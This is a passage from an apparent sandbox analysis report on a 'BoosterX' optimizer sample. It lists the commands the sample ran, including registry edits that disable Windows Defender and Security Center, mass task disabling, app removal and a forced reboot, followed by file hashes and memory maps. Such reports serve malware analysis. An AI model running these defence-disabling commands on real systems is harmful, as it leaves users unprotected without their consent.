C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Defrag\ScheduledDefrag" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Defrag\ScheduledDefrag" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Flighting\FeatureConfig\UsageDataReporting" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Diagnosis\Scheduled" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Diagnosis\Scheduled" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\Chkdsk\ProactiveScan" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic" /DISABLE2⤵
-
C:\Windows\system32\schtasks.exeschtasks /change /TN "Microsoft\Windows\MemoryDiagnostic\RunFullMemoryDiagnostic" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg -import "C:\Users\Admin\AppData\Roaming\trampios\POWERX.pow" 55555555-5555-5555-5555-5555555555552⤵
-
C:\Windows\system32\powercfg.exepowercfg -import "C:\Users\Admin\AppData\Roaming\trampios\POWERX.pow" 55555555-5555-5555-5555-5555555555553⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg -setactive 55555555-5555-5555-5555-5555555555552⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exepowercfg -setactive 55555555-5555-5555-5555-5555555555553⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow" /ve /t REG_SZ /d "Power Plan" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow" /ve /t REG_SZ /d "Power Plan" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow" /v "FriendlyTypeName" /t REG_SZ /d "Power Plan" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow" /v "FriendlyTypeName" /t REG_SZ /d "Power Plan" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow\DefaultIcon" /ve /t REG_EXPAND_SZ /d "%%SystemRoot%%\System32\powercfg.cpl,-202" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow\DefaultIcon" /ve /t REG_EXPAND_SZ /d "%C:\Windows%\System32\powercfg.cpl,-202" /f3⤵
- Modifies registry class
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCR\.pow\shell\Import\command" /ve /t REG_SZ /d "powercfg /import \"%1\"" /f2⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKCR\.pow\shell\Import\command" /ve /t REG_SZ /d "powercfg /import \"%1\"" /f3⤵
- Modifies registry class
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftSolitaireCollection*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftOfficeHub*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Office.OneNote*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Paint3D*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MSPaint*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.MicrosoftStickyNotes*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsAlarms*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsMaps*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.ZuneVideo*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.People*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.BingWeather*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*microsoft.windowscommunicationsapps*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Getstarted*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.Microsoft3DViewer*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.GetHelp*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-AppxPackage -Name "*Microsoft.WindowsFeedbackHub*" | Remove-AppxPackage2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im explorer.exe2⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start %windir%\explorer.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe3⤵
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\shutdown.exe"C:\Windows\System32\shutdown.exe" -r -t 02⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f1⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa383a855 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.logFilesize
38B
MD551a2cbb807f5085530dec18e45cb8569
SHA17ad88cd3de5844c7fc269c4500228a630016ab5b
SHA2561c43a1bda1e458863c46dfae7fb43bfb3e27802169f37320399b1dd799a819ac
SHA512b643a8fa75eda90c89ab98f79d4d022bb81f1f62f50ed4e5440f487f22d1163671ec3ae73c4742c11830214173ff2935c785018318f4a4cad413ae4eeef985df
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5958ec9d245aa0e4bd5d05bbdb37475f4
SHA180e6d2c6a85922cb83b9fea874320e9c53740bd9
SHA256a01df48cd7398ad6894bc40d27fb024dcdda87a3315934e5452a2a3e7dfb371d
SHA51282567b9f898238e38b3b6b3cdb2565be8cac08788e612564c6ac1545f161cd5c545ba833946cc6f0954f38f066a20c9a4922a09f7d37604c71c8f0e7e46a59ec
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\CachesMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\CachesMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f79b905987ace17d37befdc1924fe466
SHA10f5ed75feba347576f7c74ab77cf771a50e3276b
SHA2566b789a36e7c6a8764b86d7ba8863b72a798688974784e26497eb210d22c92d4a
SHA5124aa7e646b2b8155a487b6f7ca60d5dd6319768935347e55c114246a4728fd73c1e6fc32e71ae20a53c0e36d6831cdfe3c7b38e3d4fa61869358e879cebe99ad6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56554f33ceb27be07e836bf162228640f
SHA10b9341d8f597dbae212ccd4b79682d11ff784a99
SHA256cb7e1051c62f45c01342ade017e6f6b191ad31b1decf1e203092871db86dfdca
SHA512917258face5f247e8a832f92a4edc467d8b608993d00c8d0f0107b3d1d5e86ff82c88f596471fc1654e26584253f0ff8d33ee9d31e0f30517a3e64259dfd1401
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD596271b03a5dc39a0fb318456e141c178
SHA12cc194272c8c8c8b083a881b1ba1cf5b327bc09b
SHA256ebcf12f4da766e0779c2b6e8f56d20dcfae2310c79f644db2defd223768bbf8f
SHA51225d2e006bb1f4fc5440d1bd97b5279b142c34b959dd87ae694f44d8ce466e39e10f24725d1ca002b230329cbb9ed6d77c282521dc47abbef68cf481e8b7a06fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a73ac8ca7b1b2d04f80affa2381b1543
SHA105c8cbbf75b38f1c70b5b366e3095602935b2b22
SHA2568459ac805c677196ec7b7e893f18d7b5e19e964819968b49f8d4fc697c84982d
SHA512f0ce8511b536dd3339083974dd7d5ad544cff212a2d634d9b2d4275bd6658baa22f8be9233d69ce1a38ec1e9346efd1f7874b40f0ad57a43439da210837581eb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5864bdebabb3320a8d750372501cdca67
SHA17ce355e0c61d617f5e869ef7530a9669c303be0e
SHA256d23eba7be8f6ae5bbafb0e842b8beeec65acac317c2fc5142a9168eec93b5e16
SHA5129ace6f42e8cf45b51eb9e7dd3ae36de82b6ce7ad69d94b6d571681a93428dd77997bde6f24ec1b69f91ea22bde99330805f2a52ec1c6e949e6a415d2ebbb7054
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD522896bc44363f96664a8c9d8845ffd6b
SHA134ccd08d8b77069241a2e765d727079fd2d83dd2
SHA2564fb356685eea59e3213d62b07a1fa4924a9a33706401593ee0ae2d24972f4b44
SHA512064e6a1ab9a863684489ffd9082c2be85ff6c41b69f42be8216b576d4dddca6323731840bad53836e8c9608a9c28796fcb032e2a9c9648b3cf03b4027f81e67a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD54a2f2515b4bb245974ae840a34908b4b
SHA112bc354e22a315adfed2797544cdea1998221619
SHA256305cb9c1ab2887306f13469baf859ef06492bf2d26ca992b0b455f6d9e75ea8f
SHA512e6eea38aeafb567a2ed896e58300ac690a180751aeb3045e9c63f3c3bf5b0353d964d22dccdbf628f8781bb70261aba271e1d78a05a938cbf6987e0670d75f51
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ebb5aa4c0234288a3242d963280c9b02
SHA162e02fd681b6a829ff91d465145ac784633010cd
SHA256449a14be4f110f6ce8006f0a84ef61ce745745c733ccf7e09196bbbfd687d3b7
SHA512c2cb8a9bc69423d7926e21af1420e008c3ae3780032d938bb27dd2bed7633b6cfc2416ffd38c0ca0292aad7ac3f5efb45c05a1f4a6878adcdabf3901dea36cca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a4dc82de05e2194294b212baba29c853
SHA183e946f0b0bae72d047f3c5bb719b79bbdd248f7
SHA256b080dc4fcbc38d74c89e43686638b8ae31546dbe3c7e5300afa53e4a78458ade
SHA51202cb1396a13683ed1b67c510061b3c1e6c90245f9b115c75745f15413f094c9793ec95a5ac8f03ad59b55982aa29d88af6f3fedfba2ff23937d0038a665a9596
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ff1e45da9561c1d9c8cca2d62e47188b
SHA1f1cc8b475e9ea62039382605670f546b6a5856c4
SHA256999148dcd05fec31829021150a9b4711cec5a03f65152b398c8cd196e1780be6
SHA512fc37448d46a3ef563c2ffff553ff699e18b00d1b797c86b188c67ec0345f086cb1349a5ec18f197fee19ca7a1af1273d3eacb439990bd6e8dec84808209c4834
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD530c9e86bc18bb58f1df94fca8fc77b50
SHA1835ce670a0bb2d6af9cf9b9ce6bda30c6683cf59
SHA256702cbb0ef89624004d8e59469bec21c021915d051056878a24c63958c826c3fc
SHA5128a47de483e35508a1b921d94fc6672184a080296eb22b24addb09bd6e55d095062e3b32784979a2dcaac124d3e5c6e5a2761da31b1ffa24349cfa3d9e8603f36
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5830cf8c2c969f6d784036d11ae686c2c
SHA17280a13cc506e8cf48666d02129ae9937ea3296b
SHA2569a3278ff55b723483c1ab6034eb5f2dfbf63fea89710a987b6bdbfa174290e7d
SHA5126aa4beb67e73d5e3fcb55fbae3afdc1e0574bc16842977307a1d37576329e54180e867ed4b4bdf4b56c47cc9e81027e104bd76e375f2a1001bfe3751c213933a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53e111767b9efccf39d268160f1348540
SHA1d791f0d222642991d008092d18929b57240f0e37
SHA256000528ee75f1f59b53d295f2d136426be0d32ef344da870bb04d941f14bedd69
SHA512f80584565a56908882da5c18f557e07a6a5d4406aae6a595c6c4a3360597036b59e09f5bc18ffedf224c677541ab6abf335672258d804fd0e9025e683e07e02a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5783d79ee8d288c6a57a3ce79b6cdeca6
SHA14e56588057c74a936492b66d3f44bd1c6942853a
SHA256436ba7317a2277d3657ea06f7a07d35cde54f3ef4bd052408e7dbebf718d2ecb
SHA5127456dc4e9f26fc644b0db1c0b060e3daea59d1fed4e119d9bfe88001324c58b1eb20f6bb8dec447a8125d1e7e2d088b7629a0a1b1b2d6f565413641807658088
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD512476086a6d5d51bd96d85d60db76b95
SHA14693874074ae2b9766bfd5b630b3bf298317eeaa
SHA256a113b211386a336af080bcf051074e26a4523b007caae0cd2187ebe39a4b7c2c
SHA5122839e4ad7b5f4eb9a09a1d0f0c92c5a26c2a30ddd32f2bd4f68a21b3e72291be9be8c228baad4df535715f10b651f8415de175f8a07fb3b96d7d4740579090de
-
C:\Users\Admin\AppData\Local\Temp\A35633~1.TMPFilesize
390KB
MD5feaf8265bdeab4c3a659e2b872c8160e
SHA1fc85fd435c79c87623120e7d9c452aeeac497ba6
SHA256500c88224a7065c5512775ea205f857f494e3dfefd74d182dabaab3df097b5cd
SHA512027f627e448f40b44465b7dff821fcd1116190f4a3605d1e46f5218a126bd8028df6bc31dcb31f8290f5ebec7f4639d9ac414350fee896fb53382bc36f49cd66
-
C:\Users\Admin\Downloads\BoosterX_v1.20.zipFilesize
3.7MB
MD5a5a2f3d9879ab0bf125e25b859c6c1d1
SHA112a5668accda721c3469b9550b2acd6c21f15394
SHA2566f92d535afeb2444181341ae8eadb08726c3aee0aac49e5a49c0135ff23418c6
SHA5124ab6ad0595ec9755187948c314f5437aaa73ea0c8c6ace64f01a07d710714b47861f0ada2efcfec26022a6d2fc27f03cf76454aad401afe2e5affc3eb197ce31
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BoosterX_v1.20.exe.logFilesize
2KB
MD5f882206e4ff63200dea3af406f2beaca
SHA1edeb919b408da36418588bb282420d8bfa7c9757
SHA256e0c7c21dbf3a1f92b4a34ac53cb00ff2d4807fa01b0d8dad2156db50166a17c6
SHA5128cf2a78339d11a3b16194bdba5f8a319d0b54cc99fefff5f0c632a82ca75fe75774c1964d8efea8ea9135a450a0e5b427a49929a9b952cc611099fb151c518ea
-
\??\pipe\crashpad_1732_DTFEWSBXKLHAUSNWMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/116-162-0x0000000000000000-mapping.dmp
-
memory/432-154-0x0000000000000000-mapping.dmp
-
memory/432-156-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/432-190-0x0000000000000000-mapping.dmp
-
memory/448-196-0x0000000000000000-mapping.dmp
-
memory/704-188-0x0000000000000000-mapping.dmp
-
memory/1056-173-0x0000000000000000-mapping.dmp
-
memory/1068-203-0x0000000000000000-mapping.dmp
-
memory/1400-226-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/1472-205-0x0000000000000000-mapping.dmp
-
memory/1612-200-0x0000000000000000-mapping.dmp
-
memory/1680-211-0x0000000000000000-mapping.dmp
-
memory/1820-174-0x0000000000000000-mapping.dmp
-
memory/1888-157-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/1888-150-0x0000000000000000-mapping.dmp
-
memory/1944-222-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2116-145-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2116-139-0x0000000000000000-mapping.dmp
-
memory/2148-133-0x00000171F5AB0000-0x00000171F5AB8000-memory.dmpFilesize
32KB
-
memory/2148-132-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2148-134-0x00000171FA9E0000-0x00000171FAA18000-memory.dmpFilesize
224KB
-
memory/2148-131-0x00000171DB110000-0x00000171DB518000-memory.dmpFilesize
4.0MB
-
memory/2148-135-0x00000171F5AE0000-0x00000171F5AEE000-memory.dmpFilesize
56KB
-
memory/2148-136-0x00000171FF900000-0x00000171FF912000-memory.dmpFilesize
72KB
-
memory/2168-234-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2204-170-0x0000000000000000-mapping.dmp
-
memory/2228-219-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2228-216-0x00000194CDF70000-0x00000194CDF86000-memory.dmpFilesize
88KB
-
memory/2228-218-0x00000194CE030000-0x00000194CE056000-memory.dmpFilesize
152KB
-
memory/2228-215-0x00000194CDAB0000-0x00000194CDAD2000-memory.dmpFilesize
136KB
-
memory/2228-217-0x00000194CDF60000-0x00000194CDF6A000-memory.dmpFilesize
40KB
-
memory/2240-230-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2260-201-0x0000000000000000-mapping.dmp
-
memory/2260-152-0x0000000000000000-mapping.dmp
-
memory/2260-158-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2356-183-0x0000000000000000-mapping.dmp
-
memory/2368-163-0x0000000000000000-mapping.dmp
-
memory/2396-244-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2428-143-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/2428-138-0x0000000000000000-mapping.dmp
-
memory/2464-206-0x0000000000000000-mapping.dmp
-
memory/2720-191-0x0000000000000000-mapping.dmp
-
memory/2748-159-0x0000000000000000-mapping.dmp
-
memory/2800-169-0x0000000000000000-mapping.dmp
-
memory/2804-171-0x0000000000000000-mapping.dmp
-
memory/3088-168-0x0000000000000000-mapping.dmp
-
memory/3096-144-0x0000000000000000-mapping.dmp
-
memory/3104-236-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/3128-175-0x0000000000000000-mapping.dmp
-
memory/3160-166-0x0000000000000000-mapping.dmp
-
memory/3180-209-0x0000000000000000-mapping.dmp
-
memory/3312-192-0x0000000000000000-mapping.dmp
-
memory/3328-195-0x0000000000000000-mapping.dmp
-
memory/3404-199-0x0000000000000000-mapping.dmp
-
memory/3556-180-0x0000000000000000-mapping.dmp
-
memory/3556-198-0x0000000000000000-mapping.dmp
-
memory/3616-181-0x0000000000000000-mapping.dmp
-
memory/3700-197-0x0000000000000000-mapping.dmp
-
memory/3708-161-0x0000000000000000-mapping.dmp
-
memory/3708-186-0x0000000000000000-mapping.dmp
-
memory/3764-142-0x0000000000000000-mapping.dmp
-
memory/3764-148-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/3788-202-0x0000000000000000-mapping.dmp
-
memory/3816-184-0x0000000000000000-mapping.dmp
-
memory/3840-250-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/3876-204-0x0000000000000000-mapping.dmp
-
memory/3900-167-0x0000000000000000-mapping.dmp
-
memory/3984-248-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/4048-178-0x0000000000000000-mapping.dmp
-
memory/4100-187-0x0000000000000000-mapping.dmp
-
memory/4196-224-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/4248-212-0x0000000000000000-mapping.dmp
-
memory/4284-179-0x0000000000000000-mapping.dmp
-
memory/4292-268-0x000001AD0710B000-0x000001AD0710E000-memory.dmpFilesize
12KB
-
memory/4292-266-0x000001AD0710B000-0x000001AD0710E000-memory.dmpFilesize
12KB
-
memory/4292-272-0x000001AD05180000-0x000001AD051A0000-memory.dmpFilesize
128KB
-
memory/4292-267-0x000001AD0710B000-0x000001AD0710E000-memory.dmpFilesize
12KB
-
memory/4292-270-0x000001AD05560000-0x000001AD05568000-memory.dmpFilesize
32KB
-
memory/4292-271-0x000001AD051A0000-0x000001AD051C0000-memory.dmpFilesize
128KB
-
memory/4292-260-0x000001AD05160000-0x000001AD05180000-memory.dmpFilesize
128KB
-
memory/4292-265-0x000001AD0710B000-0x000001AD0710E000-memory.dmpFilesize
12KB
-
memory/4324-172-0x0000000000000000-mapping.dmp
-
memory/4324-208-0x0000000000000000-mapping.dmp
-
memory/4340-185-0x0000000000000000-mapping.dmp
-
memory/4440-193-0x0000000000000000-mapping.dmp
-
memory/4468-232-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/4488-242-0x00007FFAB96D0000-0x00007FFABA191000-memory.dmpFilesize
10.8MB
-
memory/4512-194-0x0000000000000000-mapping.dmp
-
